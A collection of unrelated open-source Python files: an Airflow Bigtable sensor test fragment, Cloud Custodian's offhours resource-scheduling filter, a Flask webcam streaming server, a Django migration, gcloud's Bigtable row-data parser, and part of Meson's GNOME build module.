self.assertFalse(op.poke(None))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_wait_ready(self, mock_hook):
mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.get_cluster_states_for_table.return_value = {
"cl-id": ClusterState(4)
}
op = BigtableTableWaitForReplicationSensor(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
self.assertTrue(op.poke(None))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
| owlabs/incubator-airflow | tests/contrib/operators/test_gcp_bigtable_operator.py | Python | apache-2.0 | 31,128 |
# Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Resource Scheduling Offhours
============================
Custodian provides for time based filters, that allow for taking periodic
action on a resource, with resource schedule customization based on tag values.
A common use is offhours scheduling for asgs and instances.
Features
========
- Flexible offhours scheduling with opt-in, opt-out selection, and timezone
support.
- Resume during offhours support.
- Can be combined with other filters to get a particular set (
resources with tag, vpc, etc).
- Can be combined with arbitrary actions
Policy Configuration
====================
We provide an `onhour` and `offhour` time filter, each should be used in a
different policy, they support the same configuration options:
- **weekends**: default true, whether to leave resources off for the weekend
- **weekend-only**: default false, whether to turn the resource off only on
the weekend
- **default_tz**: which timezone to utilize when evaluating time **(REQUIRED)**
- **tag**: which resource tag name to use for per-resource configuration
(schedule and timezone overrides and opt-in/opt-out); default is
``maid_offhours``.
- **opt-out**: Determines the behavior for resources which do not have a tag
matching the one specified for **tag**. Values can be either ``false`` (the
default) where the policy operates on an opt-in basis and resources must have
the tag in order to be acted on by the policy, or ``true`` where the policy
operates on an opt-out basis, and resources without the tag are acted on by
the policy.
- **onhour**: the default time to start/run resources, specified as 0-23
- **offhour**: the default time to stop/suspend resources, specified as 0-23
This example policy overrides most of the defaults for an offhour policy:
.. code-block:: yaml
policies:
- name: offhours-stop
resource: ec2
filters:
- type: offhour
weekends: false
default_tz: pt
tag: downtime
opt-out: true
onhour: 8
offhour: 20
Tag Based Configuration
=======================
Resources can use a special tag to override the default configuration on a
per-resource basis. Note that the name of the tag is configurable via the
``tag`` option in the policy; the examples below use the default tag name,
``maid_offhours``.
The value of the tag must be one of the following:
- **(empty)** or **on** - An empty tag value or a value of "on" implies night
and weekend offhours using the default time zone configured in the policy
(tz=est if unspecified) and the default onhour and offhour values configured
in the policy.
- **off** - If offhours is configured to run in opt-out mode, this tag can be
specified to disable offhours on a given instance. If offhours is configured
to run in opt-in mode, this tag will have no effect (the resource will still
be opted out).
- a semicolon-separated string composed of one or more of the following
components, which override the defaults specified in the policy:
* ``tz=<timezone>`` to evaluate with a resource-specific timezone, where
``<timezone>`` is either one of the supported timezone aliases defined in
:py:attr:`c7n.filters.offhours.Time.TZ_ALIASES` (such as ``pt``) or the name
of a geographic timezone identifier in
[IANA's tzinfo database](https://www.iana.org/time-zones), such as
``Americas/Los_Angeles``. *(Note all timezone aliases are
referenced to a locality to ensure taking into account local daylight
savings time, if applicable.)*
* ``off=(time spec)`` and/or ``on=(time spec)`` matching time specifications
supported by :py:class:`c7n.filters.offhours.ScheduleParser` as described
in the next section.
ScheduleParser Time Specifications
----------------------------------
Each time specification follows the format ``(days,hours)``. Multiple time
specifications can be combined in square-bracketed lists, i.e.
``[(days,hours),(days,hours),(days,hours)]``.
**Examples**::
# up mon-fri from 7am-7pm; eastern time
off=(M-F,19);on=(M-F,7)
# up mon-fri from 6am-9pm; up sun from 10am-6pm; pacific time
off=[(M-F,21),(U,18)];on=[(M-F,6),(U,10)];tz=pt
**Possible values**:
+------------+----------------------+
| field | values |
+============+======================+
| days | M, T, W, H, F, S, U |
+------------+----------------------+
| hours | 0, 1, 2, ..., 22, 23 |
+------------+----------------------+
Days can be specified in a range (ex. M-F).
Policy examples
===============
Turn ec2 instances on and off
.. code-block:: yaml
policies:
- name: offhours-stop
resource: ec2
filters:
- type: offhour
actions:
- stop
- name: offhours-start
resource: ec2
filters:
- type: onhour
actions:
- start
Here's doing the same with auto scale groups
.. code-block:: yaml
policies:
- name: asg-offhours-stop
resource: asg
filters:
- offhour
actions:
- suspend
- name: asg-onhours-start
resource: asg
filters:
- onhour
actions:
- resume
Additional policy examples and resource-type-specific information can be seen in
the :ref:`EC2 Offhours <ec2offhours>` and :ref:`ASG Offhours <asgoffhours>`
use cases.
Resume During Offhours
======================
These policies are evaluated hourly; during each run (once an hour),
cloud-custodian will act on **only** the resources tagged for that **exact**
hour. In other words, if a resource has an offhours policy of
stopping/suspending at 23:00 Eastern daily and starting/resuming at 06:00
Eastern daily, and you run cloud-custodian once an hour via Lambda, that
resource will only be stopped once a day sometime between 23:00 and 23:59, and
will only be started once a day sometime between 06:00 and 06:59. If the current
hour does not *exactly* match the hour specified in the policy, nothing will be
done at all.
As a result of this, if custodian stops an instance or suspends an ASG and you
need to start/resume it, you can safely do so manually and custodian won't touch
it again until the next day.
ElasticBeanstalk, EFS and Other Services with Tag Value Restrictions
====================================================================
A number of AWS services have restrictions on the characters that can be used
in tag values, such as `ElasticBeanstalk <http://docs.aws.amazon.com/elasticbean
stalk/latest/dg/using-features.tagging.html>`_ and `EFS <http://docs.aws.amazon.
com/efs/latest/ug/API_Tag.html>`_. In particular, these services do not allow
parenthesis, square brackets, commas, or semicolons, or empty tag values. This
proves to be problematic with the tag-based schedule configuration described
above. The best current workaround is to define a separate policy with a unique
``tag`` name for each unique schedule that you want to use, and then tag
resources with that tag name and a value of ``on``. Note that this can only be
used in opt-in mode, not opt-out.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# note we have to module import for our testing mocks
import datetime
import logging
from os.path import join
from dateutil import zoneinfo
from c7n.filters import Filter, FilterValidationError
from c7n.utils import type_schema, dumps
log = logging.getLogger('custodian.offhours')
def brackets_removed(u):
return u.translate({ord('['): None, ord(']'): None})
def parens_removed(u):
return u.translate({ord('('): None, ord(')'): None})
class Time(Filter):
schema = {
'type': 'object',
'properties': {
'tag': {'type': 'string'},
'default_tz': {'type': 'string'},
'weekends': {'type': 'boolean'},
'weekends-only': {'type': 'boolean'},
'opt-out': {'type': 'boolean'},
}
}
time_type = None
# Defaults and constants
DEFAULT_TAG = "maid_offhours"
DEFAULT_TZ = 'et'
TZ_ALIASES = {
'pdt': 'America/Los_Angeles',
'pt': 'America/Los_Angeles',
'pst': 'America/Los_Angeles',
'ast': 'America/Phoenix',
'at': 'America/Phoenix',
'est': 'America/New_York',
'edt': 'America/New_York',
'et': 'America/New_York',
'cst': 'America/Chicago',
'cdt': 'America/Chicago',
'ct': 'America/Chicago',
'mst': 'America/Denver',
'mdt': 'America/Denver',
'mt': 'America/Denver',
'gmt': 'Etc/GMT',
'gt': 'Etc/GMT',
'bst': 'Europe/London',
'ist': 'Europe/Dublin',
'cet': 'Europe/Berlin',
# Technically IST (Indian Standard Time), but that's the same as Ireland
'it': 'Asia/Kolkata',
'jst': 'Asia/Tokyo',
'kst': 'Asia/Seoul',
'sgt': 'Asia/Singapore',
'aet': 'Australia/Sydney',
'brt': 'America/Sao_Paulo'
}
def __init__(self, data, manager=None):
super(Time, self).__init__(data, manager)
self.default_tz = self.data.get('default_tz', self.DEFAULT_TZ)
self.weekends = self.data.get('weekends', True)
self.weekends_only = self.data.get('weekends-only', False)
self.opt_out = self.data.get('opt-out', False)
self.tag_key = self.data.get('tag', self.DEFAULT_TAG).lower()
self.default_schedule = self.get_default_schedule()
self.parser = ScheduleParser(self.default_schedule)
self.id_key = None
self.opted_out = []
self.parse_errors = []
self.enabled_count = 0
def validate(self):
if self.get_tz(self.default_tz) is None:
raise FilterValidationError(
"Invalid timezone specified %s" % self.default_tz)
hour = self.data.get("%shour" % self.time_type, self.DEFAULT_HR)
if hour not in self.parser.VALID_HOURS:
raise FilterValidationError("Invalid hour specified %s" % hour)
return self
def process(self, resources, event=None):
resources = super(Time, self).process(resources)
if self.parse_errors and self.manager and self.manager.log_dir:
self.log.warning("parse errors %d", len(self.parse_errors))
with open(join(
self.manager.log_dir, 'parse_errors.json'), 'w') as fh:
dumps(self.parse_errors, fh=fh)
self.parse_errors = []
if self.opted_out and self.manager and self.manager.log_dir:
self.log.debug("disabled count %d", len(self.opted_out))
with open(join(
self.manager.log_dir, 'opted_out.json'), 'w') as fh:
dumps(self.opted_out, fh=fh)
self.opted_out = []
return resources
def __call__(self, i):
value = self.get_tag_value(i)
# Sigh delayed init, due to circle dep, process/init would be better
# but unit testing is calling this direct.
if self.id_key is None:
self.id_key = (
self.manager is None and 'InstanceId' or self.manager.get_model().id)
# The resource tag is not present, if we're not running in an opt-out
# mode, we're done.
if value is False:
if not self.opt_out:
return False
value = "" # take the defaults
# Resource opt out, track and record
if 'off' == value:
self.opted_out.append(i)
return False
else:
self.enabled_count += 1
try:
return self.process_resource_schedule(i, value, self.time_type)
except:
log.exception(
"%s failed to process resource:%s value:%s",
self.__class__.__name__, i[self.id_key], value)
return False
def process_resource_schedule(self, i, value, time_type):
"""Does the resource tag schedule and policy match the current time."""
rid = i[self.id_key]
# this is to normalize trailing semicolons which when done allows
# dateutil.parser.parse to process: value='off=(m-f,1);' properly.
# before this normalization, some cases would silently fail.
value = ';'.join(filter(None, value.split(';')))
if self.parser.has_resource_schedule(value, time_type):
schedule = self.parser.parse(value)
elif self.parser.keys_are_valid(value):
# respect timezone from tag
raw_data = self.parser.raw_data(value)
if 'tz' in raw_data:
schedule = dict(self.default_schedule)
schedule['tz'] = raw_data['tz']
else:
schedule = self.default_schedule
else:
schedule = None
if schedule is None:
log.warning(
"Invalid schedule on resource:%s value:%s", rid, value)
self.parse_errors.append((rid, value))
return False
tz = self.get_tz(schedule['tz'])
if not tz:
log.warning(
"Could not resolve tz on resource:%s value:%s", rid, value)
self.parse_errors.append((rid, value))
return False
now = datetime.datetime.now(tz).replace(
minute=0, second=0, microsecond=0)
return self.match(now, schedule)
def match(self, now, schedule):
time = schedule.get(self.time_type, ())
for item in time:
days, hour = item.get("days"), item.get('hour')
if now.weekday() in days and now.hour == hour:
return True
return False
def get_tag_value(self, i):
"""Get the resource's tag value specifying its schedule."""
# Look for the tag, Normalize tag key and tag value
found = False
for t in i.get('Tags', ()):
if t['Key'].lower() == self.tag_key:
found = t['Value']
break
if found is False:
return False
# enforce utf8, or do translate tables via unicode ord mapping
value = found.lower().encode('utf8').decode('utf8')
# Some folks seem to be interpreting the docs quote marks as
# literal for values.
value = value.strip("'").strip('"')
return value
@classmethod
def get_tz(cls, tz):
return zoneinfo.gettz(cls.TZ_ALIASES.get(tz, tz))
def get_default_schedule(self):
raise NotImplementedError("use subclass")
class OffHour(Time):
schema = type_schema(
'offhour', rinherit=Time.schema, required=['offhour', 'default_tz'],
offhour={'type': 'integer', 'minimum': 0, 'maximum': 23})
time_type = "off"
DEFAULT_HR = 19
def get_default_schedule(self):
default = {'tz': self.default_tz, self.time_type: [
{'hour': self.data.get(
"%shour" % self.time_type, self.DEFAULT_HR)}]}
if self.weekends_only:
default[self.time_type][0]['days'] = [4]
elif self.weekends:
default[self.time_type][0]['days'] = tuple(range(5))
else:
default[self.time_type][0]['days'] = tuple(range(7))
return default
class OnHour(Time):
schema = type_schema(
'onhour', rinherit=Time.schema, required=['onhour', 'default_tz'],
onhour={'type': 'integer', 'minimum': 0, 'maximum': 23})
time_type = "on"
DEFAULT_HR = 7
def get_default_schedule(self):
default = {'tz': self.default_tz, self.time_type: [
{'hour': self.data.get(
"%shour" % self.time_type, self.DEFAULT_HR)}]}
if self.weekends_only:
# turn on monday
default[self.time_type][0]['days'] = [0]
elif self.weekends:
default[self.time_type][0]['days'] = tuple(range(5))
else:
default[self.time_type][0]['days'] = tuple(range(7))
return default
class ScheduleParser(object):
"""Parses tag values for custom on/off hours schedules.
At the minimum the ``on`` and ``off`` values are required. Each of
these must be seperated by a ``;`` in the format described below.
**Schedule format**::
# up mon-fri from 7am-7pm; eastern time
off=(M-F,19);on=(M-F,7)
# up mon-fri from 6am-9pm; up sun from 10am-6pm; pacific time
off=[(M-F,21),(U,18)];on=[(M-F,6),(U,10)];tz=pt
**Possible values**:
+------------+----------------------+
| field | values |
+============+======================+
| days | M, T, W, H, F, S, U |
+------------+----------------------+
| hours | 0, 1, 2, ..., 22, 23 |
+------------+----------------------+
Days can be specified in a range (ex. M-F).
If the timezone is not supplied, it is assumed ET (eastern time), but this
default can be configurable.
**Parser output**:
The schedule parser will return a ``dict`` or ``None`` (if the schedule is
invalid)::
# off=[(M-F,21),(U,18)];on=[(M-F,6),(U,10)];tz=pt
{
off: [
{ days: "M-F", hour: 21 },
{ days: "U", hour: 18 }
],
on: [
{ days: "M-F", hour: 6 },
{ days: "U", hour: 10 }
],
tz: "pt"
}
"""
DAY_MAP = {'m': 0, 't': 1, 'w': 2, 'h': 3, 'f': 4, 's': 5, 'u': 6}
VALID_HOURS = tuple(range(24))
def __init__(self, default_schedule):
self.default_schedule = default_schedule
self.cache = {}
@staticmethod
def raw_data(tag_value):
"""convert the tag to a dictionary, taking values as is
This method name and purpose are opaque... and not true.
"""
data = {}
pieces = []
for p in tag_value.split(' '):
pieces.extend(p.split(';'))
# parse components
for piece in pieces:
kv = piece.split('=')
# components must by key=value
if not len(kv) == 2:
continue
key, value = kv
data[key] = value
return data
def keys_are_valid(self, tag_value):
"""test that provided tag keys are valid"""
for key in ScheduleParser.raw_data(tag_value):
if key not in ('on', 'off', 'tz'):
return False
return True
def parse(self, tag_value):
# check the cache
if tag_value in self.cache:
return self.cache[tag_value]
schedule = {}
if not self.keys_are_valid(tag_value):
return None
# parse schedule components
pieces = tag_value.split(';')
for piece in pieces:
kv = piece.split('=')
# components must by key=value
if not len(kv) == 2:
return None
key, value = kv
if key != 'tz':
value = self.parse_resource_schedule(value)
if value is None:
return None
schedule[key] = value
# add default timezone, if none supplied or blank
if not schedule.get('tz'):
schedule['tz'] = self.default_schedule['tz']
# cache
self.cache[tag_value] = schedule
return schedule
@staticmethod
def has_resource_schedule(tag_value, time_type):
raw_data = ScheduleParser.raw_data(tag_value)
# note time_type is set to 'on' or 'off' and raw_data is a dict
return time_type in raw_data
def parse_resource_schedule(self, lexeme):
parsed = []
exprs = brackets_removed(lexeme).split(',(')
for e in exprs:
tokens = parens_removed(e).split(',')
# custom hours must have two parts: (<days>, <hour>)
if not len(tokens) == 2:
return None
if not tokens[1].isdigit():
return None
hour = int(tokens[1])
if hour not in self.VALID_HOURS:
return None
days = self.expand_day_range(tokens[0])
if not days:
return None
parsed.append({'days': days, 'hour': hour})
return parsed
def expand_day_range(self, days):
# single day specified
if days in self.DAY_MAP:
return [self.DAY_MAP[days]]
day_range = [d for d in map(self.DAY_MAP.get, days.split('-'))
if d is not None]
if not len(day_range) == 2:
return None
# support wrap around days aka friday-monday = 4,5,6,0
if day_range[0] > day_range[1]:
return list(range(day_range[0], 7)) + list(range(day_range[1] + 1))
return list(range(min(day_range), max(day_range) + 1))
| sixfeetup/cloud-custodian | c7n/filters/offhours.py | Python | apache-2.0 | 21,487 |
from flask import Flask, Response, make_response
from video_stream_handler import stream_handler
import logging
import cv2
# see line 398 of connectionpool.py:
logging.basicConfig(level=logging.DEBUG)
thetav = None
app = Flask(__name__, static_url_path='/public', static_folder='../')
@app.route('/video_feed')
def video_feed():
cap = cv2.VideoCapture(0)
# cap.set(3, 3840)
# cap.set(4, 1920)
return Response(stream_handler(cap), mimetype='multipart/x-mixed-replace; boundary=frame')
if __name__ == '__main__':
app.run(host='0.0.0.0', threaded=True)
| rwoodley/SphericalPhotoBrowser | server/server.py | Python | apache-2.0 | 578 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-13 01:17
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('dash', '0002_remove_post_origin'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='id',
field=models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False),
),
]
| CMPUT404W17T06/CMPUT404-project | dash/migrations/0003_auto_20170313_0117.py | Python | apache-2.0 | 497 |
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Container for Google Cloud Bigtable Cells and Streaming Row Contents."""
import copy
import six
from gcloud._helpers import _datetime_from_microseconds
from gcloud._helpers import _to_bytes
class Cell(object):
"""Representation of a Google Cloud Bigtable Cell.
:type value: bytes
:param value: The value stored in the cell.
:type timestamp: :class:`datetime.datetime`
:param timestamp: The timestamp when the cell was stored.
:type labels: list
:param labels: (Optional) List of strings. Labels applied to the cell.
"""
def __init__(self, value, timestamp, labels=()):
self.value = value
self.timestamp = timestamp
self.labels = list(labels)
@classmethod
def from_pb(cls, cell_pb):
"""Create a new cell from a Cell protobuf.
:type cell_pb: :class:`._generated.data_pb2.Cell`
:param cell_pb: The protobuf to convert.
:rtype: :class:`Cell`
:returns: The cell corresponding to the protobuf.
"""
timestamp = _datetime_from_microseconds(cell_pb.timestamp_micros)
if cell_pb.labels:
return cls(cell_pb.value, timestamp, labels=cell_pb.labels)
else:
return cls(cell_pb.value, timestamp)
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return (other.value == self.value and
other.timestamp == self.timestamp and
other.labels == self.labels)
def __ne__(self, other):
return not self.__eq__(other)
class PartialCellData(object):
"""Representation of partial cell in a Google Cloud Bigtable Table.
These are expected to be updated directly from a
:class:`._generated.bigtable_service_messages_pb2.ReadRowsResponse`
:type row_key: bytes
:param row_key: The key for the row holding the (partial) cell.
:type family_name: str
:param family_name: The family name of the (partial) cell.
:type qualifier: bytes
:param qualifier: The column qualifier of the (partial) cell.
:type timestamp_micros: int
:param timestamp_micros: The timestamp (in microsecods) of the
(partial) cell.
:type labels: list of str
:param labels: labels assigned to the (partial) cell
:type value: bytes
:param value: The (accumulated) value of the (partial) cell.
"""
def __init__(self, row_key, family_name, qualifier, timestamp_micros,
labels=(), value=b''):
self.row_key = row_key
self.family_name = family_name
self.qualifier = qualifier
self.timestamp_micros = timestamp_micros
self.labels = labels
self.value = value
def append_value(self, value):
"""Append bytes from a new chunk to value.
:type value: bytes
:param value: bytes to append
"""
self.value += value
class PartialRowData(object):
"""Representation of partial row in a Google Cloud Bigtable Table.
These are expected to be updated directly from a
:class:`._generated.bigtable_service_messages_pb2.ReadRowsResponse`
:type row_key: bytes
:param row_key: The key for the row holding the (partial) data.
"""
def __init__(self, row_key):
self._row_key = row_key
self._cells = {}
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return (other._row_key == self._row_key and
other._cells == self._cells)
def __ne__(self, other):
return not self.__eq__(other)
def to_dict(self):
"""Convert the cells to a dictionary.
This is intended to be used with HappyBase, so the column family and
column qualiers are combined (with ``:``).
:rtype: dict
:returns: Dictionary containing all the data in the cells of this row.
"""
result = {}
for column_family_id, columns in six.iteritems(self._cells):
for column_qual, cells in six.iteritems(columns):
key = (_to_bytes(column_family_id) + b':' +
_to_bytes(column_qual))
result[key] = cells
return result
@property
def cells(self):
"""Property returning all the cells accumulated on this partial row.
:rtype: dict
:returns: Dictionary of the :class:`Cell` objects accumulated. This
dictionary has two-levels of keys (first for column families
and second for column names/qualifiers within a family). For
a given column, a list of :class:`Cell` objects is stored.
"""
return copy.deepcopy(self._cells)
@property
def row_key(self):
"""Getter for the current (partial) row's key.
:rtype: bytes
:returns: The current (partial) row's key.
"""
return self._row_key
class InvalidReadRowsResponse(RuntimeError):
"""Exception raised to to invalid response data from back-end."""
class InvalidChunk(RuntimeError):
"""Exception raised to to invalid chunk data from back-end."""
class PartialRowsData(object):
"""Convenience wrapper for consuming a ``ReadRows`` streaming response.
:type response_iterator:
:class:`grpc.framework.alpha._reexport._CancellableIterator`
:param response_iterator: A streaming iterator returned from a
``ReadRows`` request.
"""
START = "Start" # No responses yet processed.
NEW_ROW = "New row" # No cells yet complete for row
ROW_IN_PROGRESS = "Row in progress" # Some cells complete for row
CELL_IN_PROGRESS = "Cell in progress" # Incomplete cell for row
def __init__(self, response_iterator):
self._response_iterator = response_iterator
# Fully-processed rows, keyed by `row_key`
self._rows = {}
# Counter for responses pulled from iterator
self._counter = 0
# Maybe cached from previous response
self._last_scanned_row_key = None
# In-progress row, unset until first response, after commit/reset
self._row = None
# Last complete row, unset until first commit
self._previous_row = None
# In-progress cell, unset until first response, after completion
self._cell = None
# Last complete cell, unset until first completion, after new row
self._previous_cell = None
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return other._response_iterator == self._response_iterator
def __ne__(self, other):
return not self.__eq__(other)
@property
def state(self):
"""State machine state.
:rtype: str
:returns: name of state corresponding to currrent row / chunk
processing.
"""
if self._last_scanned_row_key is None:
return self.START
if self._row is None:
assert self._cell is None
assert self._previous_cell is None
return self.NEW_ROW
if self._cell is not None:
return self.CELL_IN_PROGRESS
if self._previous_cell is not None:
return self.ROW_IN_PROGRESS
return self.NEW_ROW # row added, no chunk yet processed
@property
def rows(self):
"""Property returning all rows accumulated from the stream.
:rtype: dict
:returns: row_key -> :class:`PartialRowData`.
"""
# NOTE: To avoid duplicating large objects, this is just the
# mutable private data.
return self._rows
def cancel(self):
"""Cancels the iterator, closing the stream."""
self._response_iterator.cancel()
def consume_next(self):
"""Consume the next ``ReadRowsResponse`` from the stream.
Parse the response and its chunks into a new/existing row in
:attr:`_rows`
"""
response = six.next(self._response_iterator)
self._counter += 1
if self._last_scanned_row_key is None: # first response
if response.last_scanned_row_key:
raise InvalidReadRowsResponse()
self._last_scanned_row_key = response.last_scanned_row_key
row = self._row
cell = self._cell
for chunk in response.chunks:
self._validate_chunk(chunk)
if chunk.reset_row:
row = self._row = None
cell = self._cell = self._previous_cell = None
continue
if row is None:
row = self._row = PartialRowData(chunk.row_key)
if cell is None:
cell = self._cell = PartialCellData(
chunk.row_key,
chunk.family_name.value,
chunk.qualifier.value,
chunk.timestamp_micros,
chunk.labels,
chunk.value)
self._copy_from_previous(cell)
else:
cell.append_value(chunk.value)
if chunk.commit_row:
self._save_current_row()
row = cell = None
continue
if chunk.value_size == 0:
self._save_current_cell()
cell = None
def consume_all(self, max_loops=None):
"""Consume the streamed responses until there are no more.
This simply calls :meth:`consume_next` until there are no
more to consume.
:type max_loops: int
:param max_loops: (Optional) Maximum number of times to try to consume
an additional ``ReadRowsResponse``. You can use this
to avoid long wait times.
"""
curr_loop = 0
if max_loops is None:
max_loops = float('inf')
while curr_loop < max_loops:
curr_loop += 1
try:
self.consume_next()
except StopIteration:
break
@staticmethod
def _validate_chunk_status(chunk):
"""Helper for :meth:`_validate_chunk_row_in_progress`, etc."""
# No reseet with other keys
if chunk.reset_row:
_raise_if(chunk.row_key)
_raise_if(chunk.HasField('family_name'))
_raise_if(chunk.HasField('qualifier'))
_raise_if(chunk.timestamp_micros)
_raise_if(chunk.labels)
_raise_if(chunk.value_size)
_raise_if(chunk.value)
# No commit with value size
_raise_if(chunk.commit_row and chunk.value_size > 0)
# No negative value_size (inferred as a general constraint).
_raise_if(chunk.value_size < 0)
def _validate_chunk_new_row(self, chunk):
"""Helper for :meth:`_validate_chunk`."""
assert self.state == self.NEW_ROW
_raise_if(chunk.reset_row)
_raise_if(not chunk.row_key)
_raise_if(not chunk.family_name)
_raise_if(not chunk.qualifier)
# This constraint is not enforced in the Go example.
_raise_if(chunk.value_size > 0 and chunk.commit_row is not False)
# This constraint is from the Go example, not the spec.
_raise_if(self._previous_row is not None and
chunk.row_key <= self._previous_row.row_key)
def _same_as_previous(self, chunk):
"""Helper for :meth:`_validate_chunk_row_in_progress`"""
previous = self._previous_cell
return (chunk.row_key == previous.row_key and
chunk.family_name == previous.family_name and
chunk.qualifier == previous.qualifier and
chunk.labels == previous.labels)
def _validate_chunk_row_in_progress(self, chunk):
"""Helper for :meth:`_validate_chunk`"""
assert self.state == self.ROW_IN_PROGRESS
self._validate_chunk_status(chunk)
if not chunk.HasField('commit_row') and not chunk.reset_row:
_raise_if(not chunk.timestamp_micros or not chunk.value)
_raise_if(chunk.row_key and
chunk.row_key != self._row.row_key)
_raise_if(chunk.HasField('family_name') and
not chunk.HasField('qualifier'))
previous = self._previous_cell
_raise_if(self._same_as_previous(chunk) and
chunk.timestamp_micros <= previous.timestamp_micros)
def _validate_chunk_cell_in_progress(self, chunk):
"""Helper for :meth:`_validate_chunk`"""
assert self.state == self.CELL_IN_PROGRESS
self._validate_chunk_status(chunk)
self._copy_from_current(chunk)
def _validate_chunk(self, chunk):
"""Helper for :meth:`consume_next`."""
if self.state == self.NEW_ROW:
self._validate_chunk_new_row(chunk)
if self.state == self.ROW_IN_PROGRESS:
self._validate_chunk_row_in_progress(chunk)
if self.state == self.CELL_IN_PROGRESS:
self._validate_chunk_cell_in_progress(chunk)
def _save_current_cell(self):
"""Helper for :meth:`consume_next`."""
row, cell = self._row, self._cell
family = row._cells.setdefault(cell.family_name, {})
qualified = family.setdefault(cell.qualifier, [])
complete = Cell.from_pb(self._cell)
qualified.append(complete)
self._cell, self._previous_cell = None, cell
def _copy_from_current(self, chunk):
"""Helper for :meth:`consume_next`."""
current = self._cell
if current is not None:
if not chunk.row_key:
chunk.row_key = current.row_key
if not chunk.HasField('family_name'):
chunk.family_name.value = current.family_name
if not chunk.HasField('qualifier'):
chunk.qualifier.value = current.qualifier
if not chunk.timestamp_micros:
chunk.timestamp_micros = current.timestamp_micros
if not chunk.labels:
chunk.labels.extend(current.labels)
def _copy_from_previous(self, cell):
"""Helper for :meth:`consume_next`."""
previous = self._previous_cell
if previous is not None:
if not cell.row_key:
cell.row_key = previous.row_key
if not cell.family_name:
cell.family_name = previous.family_name
if not cell.qualifier:
cell.qualifier = previous.qualifier
def _save_current_row(self):
"""Helper for :meth:`consume_next`."""
if self._cell:
self._save_current_cell()
self._rows[self._row.row_key] = self._row
self._row, self._previous_row = None, self._row
self._previous_cell = None
def _raise_if(predicate, *args):
"""Helper for validation methods."""
if predicate:
raise InvalidChunk(*args)
| elibixby/gcloud-python | gcloud/bigtable/row_data.py | Python | apache-2.0 | 15,589 |
# Copyright 2015 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''This module provides helper functions for Gnome/GLib related
functionality such as gobject-introspection and gresources.'''
import build
import os, sys
import subprocess
from coredata import MesonException
import mlog
class GnomeModule:
def compile_resources(self, state, args, kwargs):
cmd = ['glib-compile-resources', '@INPUT@', '--generate']
if 'source_dir' in kwargs:
d = os.path.join(state.build_to_src, state.subdir, kwargs.pop('source_dir'))
cmd += ['--sourcedir', d]
if 'c_name' in kwargs:
cmd += ['--c-name', kwargs.pop('c_name')]
cmd += ['--target', '@OUTPUT@']
kwargs['command'] = cmd
output_c = args[0] + '.c'
output_h = args[0] + '.h'
kwargs['input'] = args[1]
kwargs['output'] = output_c
target_c = build.CustomTarget(args[0]+'_c', state.subdir, kwargs)
kwargs['output'] = output_h
target_h = build.CustomTarget(args[0] + '_h', state.subdir, kwargs)
return [target_c, target_h]
def generate_gir(self, state, args, kwargs):
if len(args) != 1:
raise MesonException('Gir takes one argument')
girtarget = args[0]
while hasattr(girtarget, 'held_object'):
girtarget = girtarget.held_object
if not isinstance(girtarget, (build.Executable, build.SharedLibrary)):
raise MesonException('Gir target must be an executable or shared library')
pkgstr = subprocess.check_output(['pkg-config', '--cflags', 'gobject-introspection-1.0'])
pkgargs = pkgstr.decode().strip().split()
ns = kwargs.pop('namespace')
nsversion = kwargs.pop('nsversion')
libsources = kwargs.pop('sources')
girfile = '%s-%s.gir' % (ns, nsversion)
depends = [girtarget]
scan_command = ['g-ir-scanner', '@INPUT@']
scan_command += pkgargs
scan_command += ['--namespace='+ns, '--nsversion=' + nsversion, '--warn-all',
'--output', '@OUTPUT@']
for incdirs in girtarget.include_dirs:
for incdir in incdirs.get_incdirs():
scan_command += ['-I%s' % os.path.join(state.environment.get_source_dir(), incdir)]
if 'link_with' in kwargs:
link_with = kwargs.pop('link_with')
for link in link_with:
lib = link.held_object
scan_command += ['-l%s' % lib.name]
if isinstance(lib, build.SharedLibrary):
scan_command += ['-L%s' %
os.path.join(state.environment.get_build_dir(),
lib.subdir)]
depends.append(lib)
if 'includes' in kwargs:
includes = kwargs.pop('includes')
if isinstance(includes, str):
scan_command += ['--include=%s' % includes]
elif isinstance(includes, list):
scan_command += ['--include=%s' % inc for inc in includes]
else:
raise MesonException('Gir includes must be str or list')
if state.global_args.get('c'):
scan_command += ['--cflags-begin']
scan_command += state.global_args['c']
scan_command += ['--cflags-end']
if kwargs.get('symbol_prefix'):
sym_prefix = kwargs.pop('symbol_prefix')
if not isinstance(sym_prefix, str):
raise MesonException('Gir symbol prefix must be str')
